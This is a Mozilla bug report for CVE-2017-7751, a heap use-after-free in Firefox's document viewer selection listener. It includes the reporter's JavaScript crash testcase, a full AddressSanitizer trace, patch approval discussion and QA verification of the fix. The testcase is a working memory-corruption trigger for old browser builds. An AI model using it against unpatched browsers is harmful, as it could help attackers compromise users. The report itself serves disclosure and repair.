Bug 1363396 (CVE-2017-7751)

heap-use-after-free in nsDocViewerSelectionListener::NotifySelectionChanged

VERIFIED FIXED in Firefox -esr52

Status

()

defect
VERIFIED FIXED
2 years ago
2 years ago

People

(Reporter: nils, Assigned: smaug)

Tracking

({csectype-uaf, sec-high})

Trunk
mozilla55
Points:
---
Bug Flags:
sec-bounty +

Firefox Tracking Flags

(firefox-esr45 wontfix, firefox-esr5254+ verified, firefox53 wontfix, firefox54+ verified, firefox55+ verified)

Details

(Whiteboard: [post-critsmash-triage][adv-main54+][adv-esr52.2+])

Attachments

(3 attachments)

(Reporter)

Description

2 years ago
The following testcase crashes the latest ASAN build of Firefox (BuildID=20170509120348)

<script>	
function start() {
	o8=document.documentElement.querySelector('*:not([id])');
	o18=document.createElement('iframe');
	o8.remove();
	o29=document.createElement('iframe');
	o296=document.createElementNS('http://www.w3.org/2000/svg','feMergeNode');
	window.top.document.documentElement.appendChild(o296);
	o18.setAttribute('src','javascript:undefined;');
	o296.replaceWith(o18);
	o610=o18.contentWindow;
	o611=o610.document;
	o612=o611.documentElement;
	o612.innerHTML="<textarea></textarea><section contenteditable>";
	window.top.document.documentElement.appendChild(o29);
	window.setTimeout(fun0, 4);
}
function fun0() {
	o971=o610.getSelection();
	o29.contentWindow.onresize=fun1;
	o29.width=1;
	o971.modify('move', 'right','lineboundary');
	location.reload();
}
function fun1() {
	document.documentElement.appendChild(o18);
}
</script>
<body onload="start()"></body>


ASAN output:
=================================================================
==12670==ERROR: AddressSanitizer: heap-use-after-free on address 0x612000077db0 at pc 0x7f538d68e6a3 bp 0x7ffca030da10 sp 0x7ffca030da08
READ of size 8 at 0x612000077db0 thread T0 (Web Content)
    #0 0x7f538d68e6a2 in operator bool /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:758:45
    #1 0x7f538d68e6a2 in GetDocumentSelection /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2637
    #2 0x7f538d68e6a2 in nsDocViewerSelectionListener::NotifySelectionChanged(nsIDOMDocument*, nsISelection*, short) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:3741
    #3 0x7f538d9a2a54 in mozilla::dom::Selection::NotifySelectionListeners() /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6489:28
    #4 0x7f538d99f6b4 in nsFrameSelection::NotifySelectionListeners(mozilla::SelectionType) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:2441:23
    #5 0x7f538d997208 in nsFrameSelection::TakeFocus(nsIContent*, unsigned int, unsigned int, mozilla::CaretAssociationHint, bool, bool) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:1891:10
    #6 0x7f538d99261b in nsFrameSelection::MoveCaret(nsDirection, bool, nsSelectionAmount, nsFrameSelection::CaretMovementStyle) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:1166:14
    #7 0x7f538d9bfa68 in mozilla::dom::Selection::Modify(nsAString const&, nsAString const&, nsAString const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6665:24
    #8 0x7f538a44f7a9 in mozilla::dom::SelectionBinding::modify(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Selection*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/SelectionBinding.cpp:886:9
    #9 0x7f538b14f95e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2954:13
    #10 0x7f5390944753 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #11 0x7f5390944753 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #12 0x7f5390945102 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #13 0x7f5391575cce in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:166:12
    #14 0x7f539152bef9 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #15 0x7f5391556443 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:479:21
    #16 0x7f5391558e17 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:739:12
    #17 0x7f5390944aa3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #18 0x7f5390944aa3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:452
    #19 0x7f539092d2ff in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #20 0x7f539092d2ff in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3025
    #21 0x7f5390913258 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #22 0x7f53909448d8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #23 0x7f5390945102 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #24 0x7f53912d718b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2891:12
    #25 0x7f538acf5c25 in mozilla::dom::Function::Call(JSContext*, JS::Handle<JS::Value>, nsTArray<JS::Value> const&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8
    #26 0x7f53894cc242 in Call<nsCOMPtr<nsISupports> > /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:72:12
    #27 0x7f53894cc242 in nsGlobalWindow::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13106
    #28 0x7f5389677ddb in mozilla::dom::TimeoutManager::RunTimeout(mozilla::dom::Timeout*) /home/worker/workspace/build/src/dom/base/TimeoutManager.cpp:720:42
    #29 0x7f5389673444 in mozilla::dom::(anonymous namespace)::TimerCallback(nsITimer*, void*) /home/worker/workspace/build/src/dom/base/Timeout.cpp:65:49
    #30 0x7f5386ef8887 in nsTimerImpl::Fire(int) /home/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:499:7
    #31 0x7f5386ec66db in nsTimerEvent::Run() /home/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:284:11
    #32 0x7f5386ed9a42 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:200:22
    #33 0x7f5386ed934f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:74:15
    #34 0x7f5386ebd2d1 in mozilla::SchedulerGroup::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:259:32
    #35 0x7f5386eeac50 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1270:14
    #36 0x7f5386ee7698 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:393:10
    #37 0x7f5387c79cd1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #38 0x7f5387bdd1d0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #39 0x7f5387bdd1d0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #40 0x7f5387bdd1d0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #41 0x7f538ce81d0f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #42 0x7f539048ba17 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:893:22
    #43 0x7f5387bdd1d0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #44 0x7f5387bdd1d0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #45 0x7f5387bdd1d0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #46 0x7f539048b545 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:709:34
    #47 0x4eb5c3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #48 0x4eb5c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #49 0x7f53a260082f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #50 0x41cf18 in _start (/home/nils/fuzzer3/firefox/firefox+0x41cf18)

0x612000077db0 is located 112 bytes inside of 296-byte region [0x612000077d40,0x612000077e68)
freed by thread T0 (Web Content) here:
    #0 0x4bb44b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f538d670105 in nsDocumentViewer::Release() /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:559:1
    #2 0x7f538f961a45 in assign_assuming_AddRef /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:334:7
    #3 0x7f538f961a45 in operator= /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:600
    #4 0x7f538f961a45 in nsDocShell::Destroy() /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5872
    #5 0x7f538f9ad32f in non-virtual thunk to nsDocShell::Destroy() /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5796:13
    #6 0x7f5389826da4 in nsFrameLoader::DestroyDocShell() /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:2144:15
    #7 0x7f5389826b05 in nsFrameLoaderDestroyRunnable::Run() /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:2082:19
    #8 0x7f538977e5fd in nsDocument::MaybeInitializeFinalizeFrameLoaders() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7279:22
    #9 0x7f538977dda6 in nsDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5111:3
    #10 0x7f538b94113c in nsHTMLDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2495:15
    #11 0x7f538987354e in ~mozAutoDocUpdate /home/worker/workspace/build/src/dom/base/mozAutoDocUpdate.h:40:18
    #12 0x7f538987354e in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:2244
    #13 0x7f5389ee8d59 in InsertBefore /home/worker/workspace/build/src/dom/base/nsINode.h:1825:12
    #14 0x7f5389ee8d59 in AppendChild /home/worker/workspace/build/src/dom/base/nsINode.h:1829
    #15 0x7f5389ee8d59 in mozilla::dom::NodeBinding::appendChild(JSContext*, JS::Handle<JSObject*>, nsINode*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/NodeBinding.cpp:856
    #16 0x7f538b14f95e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2954:13
    #17 0x7f5390944753 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #18 0x7f5390944753 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #19 0x7f539092d2ff in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #20 0x7f539092d2ff in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3025
    #21 0x7f5390913258 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #22 0x7f53909448d8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #23 0x7f5390945102 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #24 0x7f5391575cce in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:166:12
    #25 0x7f539152bef9 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #26 0x7f5391556443 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:479:21
    #27 0x7f5391558e17 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:739:12
    #28 0x7f5390944aa3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #29 0x7f5390944aa3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:452
    #30 0x7f5390945102 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #31 0x7f53912d718b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2891:12
    #32 0x7f538abaf665 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #33 0x7f538b54455b in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #34 0x7f538b54455b in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #35 0x7f538b510059 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1147:51
    #36 0x7f538b511e23 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1321:20
    #37 0x7f538b4f25c1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:464:16
    #38 0x7f538b4f59a2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:825:9

previously allocated by thread T0 (Web Content) here:
    #0 0x4bb79c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ec75d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f538d66f253 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f538d66f253 in NS_NewContentViewer() /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:478
    #4 0x7f538df829e2 in nsContentDLF::CreateInstanceForDocument(nsISupports*, nsIDocument*, char const*, nsIContentViewer**) /home/worker/workspace/build/src/layout/build/nsContentDLF.cpp:255:46
    #5 0x7f538f9c8230 in nsDocShell::CreateAboutBlankContentViewer(nsIPrincipal*, nsIURI*, bool, bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8160:19
    #6 0x7f538f96888f in nsDocShell::EnsureContentViewer() /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8022:17
    #7 0x7f538f99ccb7 in GetDocument /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:4572:3
    #8 0x7f538f99ccb7 in non-virtual thunk to nsDocShell::GetDocument() /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:4570
    #9 0x7f53894e3caa in nsPIDOMWindow<mozIDOMWindowProxy>::MaybeCreateDoc() /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:4117:48
    #10 0x7f538b97432d in GetDoc /home/worker/workspace/build/src/dom/base/nsPIDOMWindow.h:213:7
    #11 0x7f538b97432d in EnsureInnerWindow /home/worker/workspace/build/src/dom/base/nsPIDOMWindow.h:954
    #12 0x7f538b97432d in nsJSChannel::AsyncOpen(nsIStreamListener*, nsISupports*) /home/worker/workspace/build/src/dom/jsurl/nsJSProtocolHandler.cpp:581
    #13 0x7f538b976599 in nsJSChannel::AsyncOpen2(nsIStreamListener*) /home/worker/workspace/build/src/dom/jsurl/nsJSProtocolHandler.cpp:679:10
    #14 0x7f53887a5f38 in nsURILoader::OpenURI(nsIChannel*, unsigned int, nsIInterfaceRequestor*) /home/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:857:19
    #15 0x7f538f9786fd in nsDocShell::DoChannelLoad(nsIChannel*, nsIURILoader*, bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:11551:20
    #16 0x7f538f9d98be in nsDocShell::DoURILoad(nsIURI*, nsIURI*, bool, nsIURI*, bool, unsigned int, nsIPrincipal*, nsIPrincipal*, char const*, nsAString const&, nsIInputStream*, nsIInputStream*, bool, nsIDocShell**, nsIRequest**, bool, bool, bool, nsAString const&, nsIURI*, unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:11365:8
    #17 0x7f538f9754af in nsDocShell::InternalLoad(nsIURI*, nsIURI*, bool, nsIURI*, unsigned int, nsIPrincipal*, nsIPrincipal*, unsigned int, nsAString const&, char const*, nsAString const&, nsIInputStream*, nsIInputStream*, unsigned int, nsISHEntry*, bool, nsAString const&, nsIDocShell*, nsIURI*, bool, nsIDocShell**, nsIRequest**) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:10804:8
    #18 0x7f538f96c2bb in nsDocShell::LoadURI(nsIURI*, nsIDocShellLoadInfo*, unsigned int, bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:1571:10
    #19 0x7f538981112a in nsFrameLoader::ReallyStartLoadingInternal() /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:875:19
    #20 0x7f538977e440 in ReallyStartLoading /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:759:17
    #21 0x7f538977e440 in nsDocument::MaybeInitializeFinalizeFrameLoaders() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7271
    #22 0x7f538977dda6 in nsDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5111:3
    #23 0x7f538b94113c in nsHTMLDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2495:15
    #24 0x7f5389874d2b in ~mozAutoDocUpdate /home/worker/workspace/build/src/dom/base/mozAutoDocUpdate.h:40:18
    #25 0x7f5389874d2b in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:2521
    #26 0x7f5389870f12 in InsertBefore /home/worker/workspace/build/src/dom/base/nsINode.h:1825:12
    #27 0x7f5389870f12 in nsINode::ReplaceWith(mozilla::dom::Sequence<mozilla::dom::OwningNodeOrString> const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1831
    #28 0x7f538ac77224 in mozilla::dom::ElementBinding::replaceWith(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:3538:9
    #29 0x7f538b14f95e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2954:13
    #30 0x7f5390944753 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #31 0x7f5390944753 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #32 0x7f539092d2ff in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #33 0x7f539092d2ff in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3025
    #34 0x7f5390913258 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #35 0x7f53909448d8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #36 0x7f5390945102 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #37 0x7f53912d718b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2891:12
    #38 0x7f538abaf665 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37

SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:758:45 in operator bool
Shadow bytes around the buggy address:
  0x0c2480006f60: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa
  0x0c2480006f70: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c2480006f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2480006f90: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa
  0x0c2480006fa0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=>0x0c2480006fb0: fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd
  0x0c2480006fc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
  0x0c2480006fd0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c2480006fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2480006ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa
  0x0c2480007000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==12670==ABORTING
(Reporter)

Comment 1

2 years ago
Posted file ASAN output
Although the testcase uses contenteditable the stack looks more like a layout problem than an editor issue; let's start there.
Group: core-security → layout-core-security
Component: Editor → Layout
(Assignee)

Updated

2 years ago
Assignee: nobody → bugs
(Assignee)

Comment 4

2 years ago
I couldn't reproduce the crash using the testcase, but based on
code inspection this should be pretty clear.
And nsDocViewerFocusListener has similar issue.

This is ancient code, and rather ugly, but I tried to keep the changes as minimal as possible so that patching older branches is easy. The patch seems to apply to beta cleanly.
I explicitly decided to not fix any coding style issues.
Attachment #8865979 - Flags: review?(continuation)
Attachment #8865979 - Flags: review?(continuation) → review+
(Assignee)

Comment 5

2 years ago
Comment on attachment 8865979 [details] [diff] [review]
contentviewer_listeners.diff

[Security approval request comment]
How easily could an exploit be constructed based on the patch?
I'd say not very easily.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
The patch does pin point where the issue is
Commit message could be
-m "Bug 1363396, ensure ContentViewer listeners are handled only when needed, r=mccr8"


Which older supported branches are affected by this flaw?
This code is 17 years old

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
The patch should apply cleanly at least to beta


How likely is this patch to cause regressions; how much testing does it need?
Should be safe, just clearing a pointer value.
But someone should try to reproduce with and without the patch. So QA would be good here.
The patch is based on code inspection.
Attachment #8865979 - Flags: sec-approval?
Attachment #8865979 - Flags: approval-mozilla-esr52?
Attachment #8865979 - Flags: approval-mozilla-beta?
Comment on attachment 8865979 [details] [diff] [review]
contentviewer_listeners.diff

Giving sec-approval and branch approvals.
Attachment #8865979 - Flags: sec-approval?
Attachment #8865979 - Flags: sec-approval+
Attachment #8865979 - Flags: approval-mozilla-esr52?
Attachment #8865979 - Flags: approval-mozilla-esr52+
Attachment #8865979 - Flags: approval-mozilla-beta?
Attachment #8865979 - Flags: approval-mozilla-beta+
Group: layout-core-security → core-security-release
Flags: qe-verify+
Whiteboard: [post-critsmash-triage]
Whiteboard: [post-critsmash-triage] → [post-critsmash-triage][adv-main54+][adv-esr52.2+]
Alias: CVE-2017-7751
Reproduced the crash on Ubuntu 16.04 x64 using an affected build (55.0a1 linux64-asan from 2017-09-05, 20170509120348) and the test case provided by Nils in Comment 0.


This bug is verified fixed on Ubuntu 16.04 x64 using the following builds:

  * 55.0a1 linux64-asan from 2017-06-09 (20170609011144)
  * 54.0b linux64-asan from 2017-06-08 (20170608174002)
  * 52.2.0esr linux64-asan from 2017-06-08 (20170608175922)

The test case is no longer crashing.
Status: RESOLVED → VERIFIED
Flags: qe-verify+
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty+
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.